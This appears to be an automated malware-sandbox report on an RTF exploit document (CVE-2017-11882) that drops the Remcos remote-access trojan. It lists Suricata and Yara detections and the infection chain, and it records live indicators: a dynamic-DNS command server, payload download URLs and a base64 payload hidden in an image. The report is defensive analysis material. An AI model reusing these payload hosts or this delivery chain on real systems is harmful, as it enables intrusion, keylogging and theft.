                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49166 -> 192.3.101.29:14645
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49168 -> 192.3.101.29:14645
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49174 -> 192.3.101.29:14645
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49167 -> 192.3.101.29:14645
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49164 -> 192.3.101.29:14645
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49180 -> 192.3.101.29:14645
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49169 -> 192.3.101.29:14645
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49165 -> 192.3.101.29:14645
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49177 -> 192.3.101.29:14645
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49172 -> 192.3.101.29:14645
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49175 -> 192.3.101.29:14645
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49170 -> 192.3.101.29:14645
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49181 -> 192.3.101.29:14645
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49173 -> 192.3.101.29:14645
                Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 185.235.137.223:80 -> 192.168.2.22:49163
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49179 -> 192.3.101.29:14645
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49182 -> 192.3.101.29:14645
                Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 185.235.137.223:80 -> 192.168.2.22:49163
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49176 -> 192.3.101.29:14645
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49183 -> 192.3.101.29:14645
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49171 -> 192.3.101.29:14645
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49178 -> 192.3.101.29:14645
                Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE Malicious Base64 Encoded Payload In Image : 207.241.227.96:443 -> 192.168.2.22:49162
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: camzeroconnect.duckdns.org
                Uses dynamic DNS services
                Source: unknownDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficHTTP traffic detected: GET /2/items/new_image_20240905/new_image.jpg HTTP/1.1Host: ia601706.us.archive.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /220/RDESC.txt HTTP/1.1Host: 185.235.137.223Connection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 207.241.227.96 207.241.227.96
                Source: Joe Sandbox ViewIP Address: 192.3.101.29 192.3.101.29
                Source: Joe Sandbox ViewASN Name: INTERNET-ARCHIVEUS INTERNET-ARCHIVEUS
                Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                Source: Joe Sandbox ViewASN Name: AFRARASAIR AFRARASAIR
                Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                Source: global trafficHTTP traffic detected: GET /220/someimportantmeetingsgoing.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.235.137.223Connection: Keep-Alive
                Source: unknownHTTPS traffic detected: 207.241.227.96:443 -> 192.168.2.22:49162 version: TLS 1.0
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00426D42 recv,9_2_00426D42
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E26221B0-A38A-46AA-9837-7495B9BE5CE0}.tmpJump to behavior
                Source: global trafficHTTP traffic detected: GET /2/items/new_image_20240905/new_image.jpg HTTP/1.1Host: ia601706.us.archive.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /220/someimportantmeetingsgoing.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.235.137.223Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /220/RDESC.txt HTTP/1.1Host: 185.235.137.223Connection: Keep-Alive
                Source: powershell.exe, 00000008.00000002.377150281.0000000005123000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                Source: global trafficDNS traffic detected: DNS query: ia601706.us.archive.org
                Source: global trafficDNS traffic detected: DNS query: camzeroconnect.duckdns.org
                Source: powershell.exe, 00000008.00000002.374544263.00000000025FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.235.137.223
                Source: powershell.exe, 00000008.00000002.374544263.00000000025FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.235.137.223/220/RDESC.txt
                Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.359523259.00000000005FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.235.137.223/220/someimportantmeetingsgoing.tIF
                Source: EQNEDT32.EXE, 00000002.00000002.359523259.00000000005F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.235.137.223/220/someimportantmeetingsgoing.tIF$
                Source: EQNEDT32.EXE, 00000002.00000002.359523259.00000000005F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.235.137.223/220/someimportantmeetingsgoing.tIF4
                Source: EQNEDT32.EXE, 00000002.00000002.359523259.00000000005FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.235.137.223/220/someimportantmeetingsgoing.tIFj
                Source: powershell.exe, 00000008.00000002.377150281.0000000005123000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                Source: powershell.exe, 00000008.00000002.377150281.0000000005123000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                Source: powershell.exe, 00000008.00000002.377150281.0000000005123000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                Source: powershell.exe, 00000008.00000002.377150281.0000000005123000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                Source: powershell.exe, 00000008.00000002.377150281.0000000005123000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: powershell.exe, 00000008.00000002.377150281.0000000005123000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                Source: powershell.exe, 00000008.00000002.377150281.0000000005123000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                Source: RegAsm.exeString found in binary or memory: http://geoplugin.net/json.gp
                Source: powershell.exe, 00000008.00000002.375410076.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                Source: powershell.exe, 00000008.00000002.373789088.00000000005CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.c
                Source: powershell.exe, 00000008.00000002.375410076.00000000033C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000008.00000002.377150281.0000000005123000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                Source: powershell.exe, 00000008.00000002.377150281.0000000005123000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                Source: powershell.exe, 00000008.00000002.377150281.0000000005123000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                Source: powershell.exe, 00000008.00000002.377150281.0000000005123000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                Source: powershell.exe, 00000008.00000002.377150281.0000000005123000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                Source: powershell.exe, 00000008.00000002.377150281.0000000005123000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                Source: powershell.exe, 00000008.00000002.377150281.0000000005123000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                Source: powershell.exe, 00000006.00000002.378843642.00000000022C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.374544263.00000000023A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000008.00000002.377150281.0000000005123000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                Source: powershell.exe, 00000008.00000002.377150281.0000000005123000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                Source: powershell.exe, 00000008.00000002.375410076.00000000033C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000008.00000002.375410076.00000000033C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000008.00000002.375410076.00000000033C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 00000008.00000002.374544263.00000000024DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia601706.us.archive.org
                Source: powershell.exe, 00000008.00000002.373849299.0000000000850000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.373849299.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.373806430.00000000005E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.373789088.00000000005C0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.374544263.00000000024DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg
                Source: powershell.exe, 00000006.00000002.378843642.0000000002412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia601706.us.archive.org/2/items/new_image_LR
                Source: powershell.exe, 00000008.00000002.375410076.00000000033C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: powershell.exe, 00000008.00000002.377150281.0000000005123000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                Source: unknownNetwork traffic detected: HTTP traffic on port 49162 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49162

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Contains functionality to register a low level keyboard hook
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,000000009_2_0040A2F3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,9_2_0040B749
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,9_2_004168FC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,9_2_0040B749
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,9_2_0040A41B
                Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.powershell.exe.42feb20.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.powershell.exe.42feb20.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.375410076.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3732, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3844, type: MEMORYSTR

                E-Banking Fraud

                barindex
                Yara detected Remcos RAT
                Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.powershell.exe.42feb20.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.powershell.exe.42feb20.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.891483132.0000000000581000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.375410076.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3732, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3844, type: MEMORYSTR

                Spam, unwanted Advertisements and Ransom Demands

                barindex
                Contains functionalty to change the wallpaper
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041CA73 SystemParametersInfoW,9_2_0041CA73

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: SecuriteInfo.com.Exploit.CVE-2017-11882.123.22759.7388.rtf, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                Source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 8.2.powershell.exe.42feb20.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 8.2.powershell.exe.42feb20.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 8.2.powershell.exe.42feb20.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 8.2.powershell.exe.42feb20.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 8.2.powershell.exe.42feb20.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 8.2.powershell.exe.42feb20.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 00000008.00000002.375410076.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: powershell.exe PID: 3628, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 3732, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: powershell.exe PID: 3732, type: MEMORYSTRMatched rule: Detects Invoke-Mimikatz String Author: Florian Roth
                Source: Process Memory Space: powershell.exe PID: 3732, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: RegAsm.exe PID: 3844, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: C:\Users\user\Desktop\~WRD0000.tmp, type: DROPPEDMatched rule: detects CVE-2017-8759 weaponized RTF documents. Author: ditekSHen
                Windows Scripting host queries suspicious COM object (likely to drop second stage)
                Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
                Wscript starts Powershell (via cmd or directly)
